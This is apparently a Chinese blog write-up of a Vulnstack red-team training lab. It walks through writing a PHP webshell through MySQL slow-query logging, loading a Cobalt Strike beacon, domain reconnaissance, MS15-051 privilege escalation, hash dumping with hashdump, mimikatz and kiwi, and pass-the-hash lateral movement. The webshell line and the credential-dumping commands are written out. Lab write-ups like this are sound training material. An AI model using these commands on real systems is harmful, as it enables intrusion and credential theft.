红队评估一记录

本文最后更新于:2022年5月19日 晚上

环境配置

靶机下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

按要求对三个靶机进行网络环境配置,最终网络拓扑结构如下

win7 外网192.168.133.143/内网 192.168.58.128

win server 2003 内网 192.168.58.141

win server 2008 内网192.168.58.138

按靶场介绍,口令统一为hongrisec@2019

渗透流程

对端口信息进行探测,发现开启了80端口和3306端口。推测假设了WEB服务和MySQL数据库服务

image-20210815195906131

对WEB端进行目录扫描,可以发现pma和beifen.rar这两个敏感的目录/文件

image-20210815200251803

按正常来说是通过CMS进行Getshell,但这里发现可以MySQL日志GetShell,于是就直接做了

这里需要知道网站的绝对路径,这里是通过访问站点时的PHP探针发现的。除了这个还可以通过尝试或者报错的方式来进行获取。

1
2
3
set global slow_query_log=1;
set global slow_query_log_file='C:\\phpStudy\\WWW\\shell.php'
select '<?php eval($_POST[g]);?>' or sleep(11);

image-20210815202341008

写入后可以拿到WebShell

image-20210815202301100

通过在蚁剑中执行命令下载Payload并上线CS

image-20210815203137819

上线后对目标主机进行网络环境的探测,可以发现有域环境存在(必须的

1
2
shell ipconfig
shell net time /domain

image-20210815203507423

image-20210815204117739

接着寻找域控,通过命令

1
2
shell nltest /DCLIST:god.org
shell net group "domain admins" /domain

可以发现域控的主机名为OWA,以及存在的域管理员

image-20210815205053249

image-20210815205413959

在打下来的WEB服务器中架设Pivot

image-20210815205239427

之后使用MS15-051进行提权

提权完成后通过beacon命令

1
hashdump

导出目标机上的Hash

image-20210815222624985

并尝试传递哈希进行横向移动

image-20210815205501770

这里一直尝试失败,几次无果后尝试通过破解Hash的方式进行横向移动,发现是空密码。Windows中的密码一般有LM Hash和NTLM

Hash,一般来说LM Hash会被默认禁用,但这里是NTLM Hash,居然也是空密码。这里原因未知,可能是hashdump本身命令的原因,占个坑,将来懂了再来写。

image-20210815222724451

几番尝试后,发现可以使用梼杌导出全部域用户的Hash(使用mimikatz也可以)

image-20210815222534895

这个Hash在后面的测试中是可以传递成功的

image-20210816105238110

之后尝试使用msf进行同样的hashdump操作,msf倒是表现得比较好

1
2
load kiwi
creds_all

image-20210815222744934

之后创建一个smb类型的listener(这里必须要使用smb,不能用http,原因未知)

image-20210815222859281

尝试进行PTH,并将我们拿到的不是空字符串的Hash填入,并配置域名、Listener和Session

image-20210815223007953

点击Launch后就能拿到相应主机的Beacon

image-20210815223057238

对其他机器的渗透同理。进行两次PTH操作后就能拿到所有主机的权限。


红队评估一记录
https://m0ck1ng-b1rd.github.io/2021/12/07/vulstack/红队评估一/
作者
何语灵
发布于
2021年12月7日
许可协议